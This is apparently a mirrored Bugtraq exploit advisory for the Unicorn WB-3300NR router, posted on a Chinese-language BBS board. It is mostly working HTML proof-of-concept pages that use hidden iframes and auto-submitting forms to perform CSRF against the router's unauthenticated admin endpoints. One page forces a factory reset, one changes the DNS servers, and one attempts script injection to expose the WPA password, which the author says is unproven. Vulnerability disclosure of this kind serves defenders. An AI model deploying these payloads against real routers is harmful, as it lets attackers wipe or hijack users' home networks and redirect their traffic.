Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

看板Bugtraq作者時間12年前 (2013/12/22 10:32), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
# Exploit Title: Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change) # Exploit Author: absane # Blog: http://blog.noobroot.com # Discovery date: October 29th 2013 # Vendor Homepage: http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr # Tested on: Unicorn WB-3300NR v1.0 # Firmware Version: V5.07.18_ko_UIS02 *************** *Vulnerability* *************** The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities. Considering that by default the administrative pages do not require authentication, countless exploits exist. ****************** *Proof of Concept* ****************** 1) Factory Reset <html><body> <iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe> <form name="csrf_form" action="http://192.168.123.254/goform/SysToolRestoreSet" method="post" target="cantseeme"> <input type="hidden" name="CMD" value='SYS_CONF'> <input type="hidden" name="GO" value='system_reboot.asp'> <input type="hidden" name="CCMD" value='0'> <script>document.csrf_form.submit();</script> </body></html> 2) Alter the DNS Settings <html><body> <iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe> <form name="csrf_form" action="http://192.168.123.254/goform/AdvSetDns" method="post" target="cantseeme"> <input type="hidden" name="GO" value='wan_dns.asp'> <input type="hidden" name="rebootTag" value=''> <input type="hidden" name="DSEN" value='1'> <input type="hidden" name="DNSEN" value='on'> <input type="hidden" name="DS1" value='8.8.4.4'> <input type="hidden" name="DS2" value='8.8.8.8'> <script>document.csrf_form.submit();</script> </body></html> 3) WPA Password Disclosure (possibility)(not proven) The following PoC code only demostrates that with CSRF and XSS, it might be possible to obtain the WPA password. However, I have been unable to do so without forcing the router to revert to factory defaults. <html><body> <iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe> <form name="csrf_form" action="http://192.168.123.254/goform/WizardHandle" method="post" target="cantseeme"> <input type="hidden" name="MACC" value='"; var x = ""; function y() {alert(def_wirelesspassword);} x = window.setTimeout(y,2000);//'> <script>document.csrf_form.submit();</script> </body></html>
更多 jsibley1. 的文章
文章代碼(AID): #1Ijaydjp (Bugtraq)